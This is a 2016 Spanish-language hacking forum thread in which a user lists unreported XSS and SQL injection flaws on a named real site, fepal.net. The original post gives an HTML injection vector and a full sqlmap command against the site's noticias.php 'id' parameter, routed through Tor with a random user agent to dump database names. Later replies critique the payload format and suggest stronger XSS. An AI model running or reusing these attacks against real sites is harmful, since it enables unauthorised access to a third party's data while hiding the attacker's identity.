[SQLi , XSS] www.fepal.net

Iniciado por rreedd, Marzo 05, 2016, 09:37:52 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Marzo 05, 2016, 09:37:52 PM Ultima modificación: Marzo 06, 2016, 08:28:17 AM por EPSILON
Hola !!!
Bienvenido a mi post

RREEDD
Sitio :No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descripción del sitio:  Federación Española de Asociación de Profesores de Audición y Lenguaje.

Lista de Vulnerabilidades.

  • [XSS] Inyección en URL .
       
        Url del sitio :No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
        Vector : <h1>underc0de</h1>
        xploit : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta<h1>underc0de</h1>&pg=1
        Reportado: NO
        Autor: RREEDD


  • [SQLi] Inyección en URL.
       
        Url del sitio :No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
        Inyeccion :  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -u "www.fepal.net/noticias.php?id=1&pg=1" -p "id"  --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --time-sec 15
        Herramienta : SQLMAP
        Reportado: NO
        Autor: RREEDD
Saludos desde Chile
Marzo 06, 2016, 08:50:58 AM #1
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.
Marzo 06, 2016, 10:35:16 AM #2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.

Además de eso, cuando buscas una XSS tienes que buscar ejecutar código javascript, en muchas ocasiones te permite poner una etiqueta html, pero no se puede llegar a ejecutar un código javascript.

Éste Payload estaría mejor: "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Marzo 06, 2016, 12:05:45 PM #3
RREEDDHola!!
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta no se puede tomar como payload unos resultados de sqlmap por consola, tienes que poner la inyección entera por GET.

Saludos, EPSILON.
Gracias por la aclaración, porque mi intención al poner el payload de sqlmap era demostrar que era vulnerable, así que lo tendre en mente para la próxima.

Muchas gracias a todos por comentar.

Saludos desde Chile.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario